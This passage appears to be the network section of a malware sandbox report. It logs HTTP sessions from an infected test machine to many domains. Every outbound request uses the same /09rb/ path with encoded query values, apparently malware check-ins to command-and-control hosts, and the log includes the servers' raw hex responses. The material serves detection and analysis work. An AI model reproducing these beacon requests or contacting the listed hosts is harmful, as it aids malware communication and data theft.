4f 58 42 44 63 31 4a 35 5a 32 68 48 53 48 55 31 56 44 68 4b 54 6b 39 4c 56 57 52 35 53 31 45 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 Data Ascii: 5daa<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.hypesoleco.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.hypesoleco.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.hypesoleco.com/sk-logabpstatus.php?a=YVd2THROZk9rZ0U5clNsOFYvcWpmYjJjMlU3QklFeGVUZVNBV3VabjhYVkVQN3g4Mkk1UGpIUGhqbTRTMDNZYUtPeTdBcHFhc3NhOGtUK2lKR1lKOXBDc1J5Z2hHSHU1VDhKTk9LVWR5S1E9&b="+abp;document.body.appendChild(imglog);if(typeof ab
Jul 22, 2021 14:12:29.933242083 CEST	4929	IN	Data Raw: 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d Data Ascii: perurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='hypesoleco.com' d='entity_mapped'" /><title>Hypesoleco.com</title><meta http-equiv="Content-Type" co
Jul 22, 2021 14:12:29.933305025 CEST	4931	IN	Data Raw: 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75 62 75 6e 74 75 2d 62 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e Data Ascii: age.com/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf") format("truetype"),url(
Jul 22, 2021 14:12:29.933365107 CEST	4932	IN	Data Raw: 20 32 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 70 69 63 73 2f 31 32 34 37 31 2f 6b 77 62 67 2e 6a 70 67 29 20 6e Data Ascii: 25px 5px;background: url(http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg) no-repeat center center;background-size: cover}.popular-searches ul.first{ list-style: none;width: 380px;margin:0 auto;}.popular-searches ul.last, .related-s
Jul 22, 2021 14:12:29.933423042 CEST	4933	IN	Data Raw: 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 Data Ascii: d-wrap: break-word;font-size: 24px;color: #ffffff;font-family: Arial, Helvetica, sans-serif; display:block;background:url(http://i2.cdn-image.com/__media__/pics/12471/logo.png) no-repeat left center; font-weight: bold; padding: 15px 0px 15px 6
Jul 22, 2021 14:12:29.933480978 CEST	4935	IN	Data Raw: 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 7d 0d 0a 0d 0a 2e 73 72 63 68 42 74 6e 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 32 35 32 38 61 20 75 72 6c 28 68 74 74 Data Ascii: -radius:0;border-radius:0;color: #ffffff}.srchBtn {background: #22528a url(http://i2.cdn-image.com/__media__/pics/12471/search-icon.png) no-repeat center center; border: none; color: #fff; cursor: pointer; float: right; font-size: 14px; he
Jul 22, 2021 14:12:29.933538914 CEST	4936	IN	Data Raw: 62 6f 74 74 6f 6d 3a 20 33 30 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 6c 69 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 35 70 78 7d 0d 0a 64 69 76 2e 73 65 61 Data Ascii: bottom: 30px}.popular-searches li {margin-bottom: 0px;margin-top: 15px}div.search-form{width: 300px} .srchTxt{width: 250px;font-size: 16px;line-height: 20px} .website .domain{font-size: 23px;padding-top: 19px} .footer-relate
Jul 22, 2021 14:12:29.933598995 CEST	4937	IN	Data Raw: 62 73 69 74 65 7b 6d 61 78 2d 77 69 64 74 68 3a 20 39 35 25 3b 7d 0d 0a 20 20 20 20 2e 73 72 63 68 54 78 74 7b 77 69 64 74 68 3a 20 32 30 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 Data Ascii: bsite{max-width: 95%;} .srchTxt{width: 200px;font-size: 16px;line-height: 20px} }.content-container{background: none !important}.main-container{border:none !important;height: auto !important}.header{border:none !important;hei
Jul 22, 2021 14:12:29.933656931 CEST	4939	IN	Data Raw: 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 Data Ascii: } </style><![endif]--><script language="JavaScript" type="text/javascript" src="http://i2.cdn-image.com/__media__/js/min.js?v2.2"></script></head><body onload="" onunload="" onBeforeUnload=""><div style="visibility:hidden;disp
Jul 22, 2021 14:12:29.933716059 CEST	4940	IN	Data Raw: 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 79 70 65 73 6f 6c 65 63 6f 2e 63 6f 6d 2f 64 69 73 70 6c 61 79 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 Data Ascii: y:none;" action="http://www.hypesoleco.com/display.cfm" method="get" target="_top" onsubmit="showPop=0;" > <input name="s" type="text" onClick="this.value='';" class="srchTxt" />
Jul 22, 2021 14:12:30.053317070 CEST	4942	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 66 69 72 73 74 22 3e 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 79 70 Data Ascii: <ul class="clearfix first"> <li><a href="http://www.hypesoleco.com/All_Inclusive_Vacation_Packages.cfm?fp=az39z4%2Bp5nrQlAwIG7gHnH1q8FT%2BSXzOgRXanRlzeoyca5pqZyrORdjN%2BlMzkpbH7JsWpSL6G59D18qSvnl7lyNQ7jowt6e%2Bjc%2Fc

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.11.11	49206	91.195.240.94	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:32.953301907 CEST	4948	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1 Host: www.electricbrandsusa.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:32.989867926 CEST	4949	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.electricbrandsusa.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= Date: Thu, 22 Jul 2021 12:12:32 GMT Content-Length: 173 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 65 63 74 72 69 63 62 72 61 6e 64 73 75 73 61 2e 63 6f 6d 2f 30 39 72 62 2f 3f 73 56 7a 3d 6d 54 49 58 4e 48 4b 70 32 76 78 78 4d 26 61 6d 70 3b 35 30 4d 74 6b 68 61 3d 62 45 37 38 4b 32 42 7a 2b 2f 43 58 59 32 6e 51 49 54 57 33 36 72 6e 2b 30 47 72 70 57 56 6c 48 2b 6a 41 62 6a 65 58 71 65 69 30 43 63 49 65 30 49 38 30 5a 71 4e 4c 65 70 4e 63 76 62 62 30 4d 4c 68 45 3d 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.electricbrandsusa.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE=">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.11.11	49207	75.2.26.18	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:35.996997118 CEST	4949	OUT	GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.decoratudo.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:36.183383942 CEST	4950	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Thu, 22 Jul 2021 12:12:36 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.11.11	49208	154.201.255.27	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:39.368575096 CEST	4951	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1 Host: www.rshuahui.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:39.554577112 CEST	4951	IN	HTTP/1.1 503 Service Temporarily Unavailable Server: nginx Date: Thu, 22 Jul 2021 12:12:39 GMT Content-Type: text/html Content-Length: 190 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.11.11	49209	34.102.136.180	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:42.564234972 CEST	4952	OUT	GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.lidokeyhomes.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:42.671833992 CEST	4952	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 22 Jul 2021 12:12:42 GMT Content-Type: text/html Content-Length: 275 ETag: "60f790d8-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.11.11	49210	63.250.34.223	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:45.841383934 CEST	4953	OUT	GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1 Host: www.iregentos.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:46.008169889 CEST	4954	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 12:12:45 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 280 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 72 65 67 65 6e 74 6f 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.iregentos.info Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.11.11	49211	66.96.147.113	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:12:49.952766895 CEST	4954	OUT	GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.dutythrow.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:12:50.070712090 CEST	4956	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 12:12:49 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 2 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.11.11	49194	66.235.200.145	80

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:11:15.299109936 CEST	4879	OUT	GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.exploringelleblog.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:11:17.375323057 CEST	4880	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 12:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 CF-Cache-Status: MISS Server: cloudflare CF-RAY: 672c920cacb70211-ZRH Data Raw: 32 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 45 78 70 6c 6f 72 69 6e 67 20 45 6c 6c 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 78 70 6c 6f 72 69 6e 67 2d 65 6c 6c 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 65 78 70 6c 6f 72 69 6e 67 2d 65 6c 6c 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c Data Ascii: 229d<!DOCTYPE html><html lang="en-US"><head><meta name="viewport" content="width=device-width"><title>Exploring Elle — Coming Soon</title><meta name="robots" content="noindex, nofollow" /><scriptsrc="http://exploring-elle.com/wp-includes/js/jquery/jquery.js"></script><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600" rel="stylesheet"><style type="text/css">body {background-color: #fff;background-image: url("http://exploring-elle.com/wp-content/plugins/bluehost-wordpress-plugin/static/images/cs-bluehost-bg.jpg");background-position: top right;background-repeat: no-repeat;font-family: "Open Sans", sans-serif;overflow-x: hidden;}* {box-sizing: border-box;-moz-box-sizing: border-box;-webkit-box-sizing: border-box;}input {font-family: "Open Sans", sans-serif;}::-webkit-input-placehol
